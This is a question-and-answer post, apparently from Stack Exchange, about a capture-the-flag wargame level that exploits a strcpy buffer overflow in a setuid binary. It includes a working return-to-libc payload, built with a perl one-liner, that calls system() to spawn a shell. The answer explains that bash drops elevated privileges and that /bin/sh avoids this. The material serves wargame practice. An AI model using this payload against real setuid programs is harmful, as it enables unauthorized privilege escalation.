BOF with non exec stack

Question

I'm try to pass the level 2 of this "game" http://smashthestack.org/faq.html (connect via ssh on the blackbox server) that consist of a basic buffer overflow.

In the directory /home/level2 (there is a directory for each level with a file that contain the password for that level) there is an executable file called getowner and its source code:

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *filename;
    char buf[128];

    if((filename = getenv("filename")) == NULL) {
        printf("No filename configured!\n");
        return 1;
    }

    while(*filename == '/')
        filename++;
    strcpy(buf, "/tmp/");
    strcpy(&buf[strlen(buf)], filename);

    struct stat stbuf;
    stat(buf, &stbuf);
    printf("The owner of this file is: %d\n", stbuf.st_uid);

    return 0;
}

The user that own the executable file is level3

level2@blackbox:~$ ls -lisa getowner
2370021 8 -rwsr-x--- 1 level3 gamers 7797 2017-05-24 01:56 getowner

So if i can exploit the buffer overflow and spawn a shell as level3, i can read the file /home/level3/password, get the password and win the level: am i right?

So

1) i tried to upload a shellcode in an environment variable and forge the filename variable to modify the return address in the stack to return on the shellcode, but as you can see

level2@blackbox:~$ readelf -l getowner | grep GNU_STACK
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

code in the stack cannot be executed.

2) then, i try to use the Return-to-libc attack and call system(/bin/bash), but in the spawned shell I'm still level2 user :(

level2@blackbox:~$ export filename=$(perl -e 'print "a" x135;print "\xb0\x59\xee\xb7" ; print "\x20\xb4\xed\xb7" ; print "\x32\xfe\xff\xbf"')
level2@blackbox:~$ ./getowner 
The owner of this file is: -1207961948
bash-3.1$ id
uid=1003(level2) gid=1005(gamers) gruppi=1003(level2),1005(gamers)

Where 0xb7ee59b0 in the address of system(), 0xb7edb420 is the address of exit() and 0xbffffe32 is the address of the string /bin/bash.

do I have other options or are I mistaken?

Answer 1

Your second approach is correct but you should use /bin/sh or (/bin/dash if /bin/sh is a symlink to /bin/bash).

One of the first thing bash does is to drop your euid privileges to uid. See this stackexchange answer for more details.